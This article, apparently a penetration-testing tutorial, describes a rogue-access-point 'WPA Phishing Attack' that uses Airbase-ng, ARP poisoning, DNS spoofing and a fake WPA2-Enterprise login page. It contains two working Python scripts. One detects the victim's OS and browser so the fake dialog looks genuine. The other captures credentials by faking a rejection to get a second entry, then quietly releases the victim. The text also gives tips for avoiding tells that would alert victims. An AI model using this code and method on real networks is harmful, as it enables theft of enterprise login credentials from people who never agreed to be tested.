Wireless phishing


Introduction

Social engineering attacks have become more popular among professional penetration testers, and also more technical. Not long ago a pen-tester could simply call a few of a company's employees under false pretenses and obtain passwords, login details, and more. With the security awareness work of today's leading computer security experts, such attacks have become much harder to pull off, and social engineering methods have evolved accordingly. Newer attacks construct more convincing false pretenses. In phishing, for example, an attacker sets up a web server that imitates another web server. ARP poisoning and DNS spoofing take this a step further: the victim's browser shows the hostname of the real site, which demands a login, while the page actually comes from the attacker. (This holds for plain HTTP; a site served over HTTPS would still produce a certificate warning unless the attacker also downgrades the connection to plain HTTP.)

Rogue APs are the biggest threat to wireless security today, because 802.11 is a shared medium: the RF energy leaving an antenna propagates in all directions, even when focused with a semi-directional or directional antenna, so any station in range can hear it and answer. Rogue AP attacks are in fact a type of social engineering attack. Tools such as Airbase-ng in the Aircrack-ng suite let an attacker impersonate an AP: it puts a radio into Master mode, sends beacons, accepts incoming associations, and, with a little help from iptables, routes packets just as if the radio were a real AP. With solid networking knowledge, an attacker can bridge the rogue AP radio to a second radio that has an internet connection through another wireless router. Getting a victim to connect to the fake AP is rather simple: clients generally associate with the AP whose signal they receive most strongly, which is why these are on-site attacks and why a higher EIRP for the attacker's radio is better.

WPA

The WPA Phishing Attack uses all of the above concepts to attack WPA2-Enterprise networks, with a bit of its own style. Airbase-ng is used to create a rogue wireless access point in the vicinity of the environment the pen-tester has been hired to assess. The attacker's machine also runs a DHCP server to hand out IP addresses and an HTTP/PHP server to host the phisher itself.

The attack then uses simple tools to ARP poison and DNS spoof the victim, redirecting all HTTP to the local web server hosting the phisher until credentials show up in its log file. (Because the victim's default gateway is the attacker's machine, the same redirect can also be done with an iptables NAT REDIRECT rule on the rogue AP interface.)

THE PHISHER

The phisher performs OS/browser detection and serves a web page according to the result. This simple page is a fake error page with a fake WPA/WPA2 authentication window embedded in it.

OS detection is necessary to convince the victim that he or she needs to re-authenticate with the wireless AP: the fake dialog has to look like that OS's own dialog. Browser detection is necessary because the text fields vary in height between browsers. If a username has already been obtained by the attacker, either through an offline social engineering attack or from a wireless sniffing device, it can be pre-filled in the username field so that the fake login/re-authentication window looks more genuine, like so:

<input type="text" value="victim name" />

The OS/browser detection adjusts the padding between the top of the check box and the three form fields, and swaps the embedded background images, the image of the WPA2-Enterprise login window, and the OK button accordingly. For example, Windows XP (NT 5.1) with MSIE needs a wider centre text box than Windows XP (NT 5.1) with Chrome or Firefox. Many small differences like this across OSs and browsers make the layout work quite tedious.
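As an added example (not the article's PHP phisher), here is the User-Agent detection step written in Python: regular expressions pull the OS and browser out of the header, and the pair selects a layout record for the fake dialog. The User-Agent strings, the layout table and its pixel values and image names are constructed for this example and are assumptions, not measurements from the original page.

```python
import re

# Constructed User-Agent strings used as sample input; they are typical
# shapes for each browser, not captures from a real victim.
SAMPLE_USER_AGENTS = {
    "xp_ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
    "xp_chrome": ("Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"),
    "win7_firefox": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
    "win10_ie11": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "mac_safari": ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 "
                   "(KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"),
}

# Windows NT kernel version as it appears in the header -> product name.
WINDOWS_VERSIONS = {
    "5.1": "Windows XP", "6.0": "Windows Vista", "6.1": "Windows 7",
    "6.2": "Windows 8", "6.3": "Windows 8.1", "10.0": "Windows 10",
}

# Order matters: a Chrome header also contains "Safari", and IE11 dropped the
# "MSIE" token, identifying itself only by "Trident/7.0 ... rv:11.0".
BROWSER_PATTERNS = [
    ("MSIE", re.compile(r"MSIE (\d+)")),
    ("MSIE", re.compile(r"Trident/\d+\.\d+.*rv:(\d+)")),
    ("Firefox", re.compile(r"Firefox/(\d+)")),
    ("Chrome", re.compile(r"Chrome/(\d+)")),
    ("Safari", re.compile(r"Version/(\d+)[\d.]*.*Safari/")),
]


def detect_os(user_agent):
    """Return a product name for the OS named in the User-Agent header."""
    m = re.search(r"Windows NT (\d+\.\d+)", user_agent)
    if m:
        return WINDOWS_VERSIONS.get(m.group(1), "Windows NT " + m.group(1))
    if "Mac OS X" in user_agent:
        return "Mac OS X"
    if "Linux" in user_agent:
        return "Linux"
    return "unknown"


def detect_browser(user_agent):
    """Return (browser name, major version); ("unknown", 0) if nothing matches."""
    for name, pattern in BROWSER_PATTERNS:
        m = pattern.search(user_agent)
        if m:
            return name, int(m.group(1))
    return "unknown", 0


# Hypothetical layout table. The keys follow the article's observation that
# XP/MSIE needs a wider centre text box than XP/Chrome or XP/Firefox; the pixel
# values and image names are placeholders assumed for this example.
LAYOUTS = {
    ("Windows XP", "MSIE"):    {"top_padding": 18, "field_width": 260, "window_image": "xp_eap.png"},
    ("Windows XP", "Chrome"):  {"top_padding": 16, "field_width": 244, "window_image": "xp_eap.png"},
    ("Windows XP", "Firefox"): {"top_padding": 17, "field_width": 244, "window_image": "xp_eap.png"},
    ("Windows 7", "MSIE"):     {"top_padding": 20, "field_width": 270, "window_image": "win7_eap.png"},
    ("Windows 7", "Firefox"):  {"top_padding": 19, "field_width": 256, "window_image": "win7_eap.png"},
}
DEFAULT_LAYOUT = {"top_padding": 18, "field_width": 250, "window_image": "generic_eap.png"}


def choose_layout(user_agent):
    """Map a User-Agent header to (os, browser, layout) for the phishing page."""
    os_name = detect_os(user_agent)
    browser, _version = detect_browser(user_agent)
    return os_name, browser, LAYOUTS.get((os_name, browser), DEFAULT_LAYOUT)


if __name__ == "__main__":
    for label, ua in SAMPLE_USER_AGENTS.items():
        os_name, browser, layout = choose_layout(ua)
        print(f"{label:13s} -> {os_name} / {browser} -> width {layout['field_width']}px")
```

The pattern order is the part that bites in practice: test a Chrome header before a Safari one and an IE11 header (no "MSIE" token) before assuming the MSIE pattern alone is enough, or the wrong dialog image is served and the victim is handed an obvious tell.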

Below is an image of how the User-Agent appears to the web server from a Microsoft Windows XP / IE browser machine.


Figure 1 – Normal MITM attack operation

The image above shows a normal MITM attack using Airbase-ng. The attacker's [red] traffic is from the radio in Master mode. The [green] traffic is from a separate radio in Managed mode, associated and authenticated with a valid session to the real AP. Traffic from the victim traverses to the attacker, to the AP, back to the attacker, and finally back to the victim. One can imagine the devastating effects of this simple attack.

In the WPA Phishing Attack, the traffic is instead stopped by the attacker, who serves a fake WPA/WPA2 login page matching the OS and browser that the PHP server identifies from the User-Agent header with regular expressions.

Once the wpa-credcheck.php script detects a login attempt, the attacker is notified in his or her web browser. The login prompt is then shown a second time, as if the first credentials had been rejected. This creates the illusion of a typo, and it also catches victims who deliberately typed false credentials into a network they did not recognise. After the second set of credentials is captured, the attacker stops the ARP poisoning and DNS spoofing, letting traffic pass through as in a normal MITM operation. The URL the victim was originally trying to reach is handed straight back to the browser via PHP. This creates a seamless fake login experience for the victim and gives the pen-tester a better payload: the WPA2-Enterprise username and password.
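The two-attempt flow above, as an added example in Python rather than the article's wpa-credcheck.php (the original script is not reproduced on the page). It reads constructed log lines in a format assumed for this example, tracks submissions per client, answers the first submission with a "bad credentials" retry and the second with a release that carries the victim's original URL, which is the point at which the operator stops the spoofing tools. The log format, field names, addresses and credentials are all assumptions.

```python
import re
from collections import defaultdict

# Constructed log excerpt in a format assumed for this example; the real
# wpa-credcheck.php log format is not shown on the page, and the credentials
# are made up. One page_served entry, two submissions from the first client,
# one from a second client.
SAMPLE_LOG = """\
2013-04-02 10:15:01 client=192.168.1.23 ua="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)" url=http://intranet.example/ event=page_served
2013-04-02 10:15:40 client=192.168.1.23 url=http://intranet.example/ event=submit user=CORP\\jdoe pass=Summer2013
2013-04-02 10:16:05 client=192.168.1.23 url=http://intranet.example/ event=submit user=CORP\\jdoe pass=Summer2013!
2013-04-02 10:17:11 client=192.168.1.31 url=http://news.example/ event=submit user=guest pass=guest
"""

LOG_LINE = re.compile(
    r'^(?P<ts>\S+ \S+) client=(?P<client>\S+) (?:ua="[^"]*" )?'
    r'url=(?P<url>\S+) event=(?P<event>\w+)'
    r'(?: user=(?P<user>\S+) pass=(?P<password>\S+))?$'
)


def parse_log_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


class CredCheck:
    """Decide, per client, whether to show the fake prompt again or release it.

    The first submission is answered with a retry ("bad credentials") so the
    victim re-types the password; the second is taken as the real one, after
    which the client is released and sent to the URL it originally requested.
    """

    def __init__(self, required_attempts=2):
        self.required_attempts = required_attempts
        self.attempts = defaultdict(list)   # client -> [(user, password), ...]
        self.released = set()

    def handle_submit(self, client, url, user, password):
        if client in self.released:
            # Already released: never re-prompt, just pass the victim through.
            return {"action": "pass", "redirect": url}
        self.attempts[client].append((user, password))
        if len(self.attempts[client]) < self.required_attempts:
            return {"action": "retry", "message": "bad credentials"}
        self.released.add(client)
        return {"action": "release", "redirect": url}

    def best_guess(self, client):
        """The last password typed is the one most likely to be correct."""
        tries = self.attempts.get(client)
        return tries[-1] if tries else None


def process_log(text, checker=None):
    """Feed every submit event in the log through the checker; return decisions."""
    checker = checker or CredCheck()
    decisions = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None or rec["event"] != "submit":
            continue
        decision = checker.handle_submit(rec["client"], rec["url"], rec["user"], rec["password"])
        decisions.append((rec["ts"], rec["client"], decision))
    return checker, decisions


if __name__ == "__main__":
    checker, decisions = process_log(SAMPLE_LOG)
    for ts, client, decision in decisions:
        print(ts, client, decision)
    for client in checker.released:
        print("captured from", client, "->", checker.best_guess(client))
```

Keying the state on the client address (or MAC, on the rogue AP's interface) is what keeps the second prompt from being shown to a victim who has already been released; both attempts are kept because the pair reveals whether the first entry was a typo or a deliberately bogus password.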


Figure 2 – The Flow

The image above illustrates the flow of the WPA Phishing Attack step by step. During "A" the user is browsing the web normally. Once the computer attaches to the rogue access point, "B" occurs, forcing the user to enter login credentials to continue. After entering credentials in "C", the victim's traffic flows directly to the second radio and out to the real AP. This is an interrupt attack: it interrupts the victim's normal network operation.

The Line-Out attack is much simpler: it occurs when a victim opens his or her laptop and the client connects directly to the attacker's rogue AP, so there is no existing session to interrupt.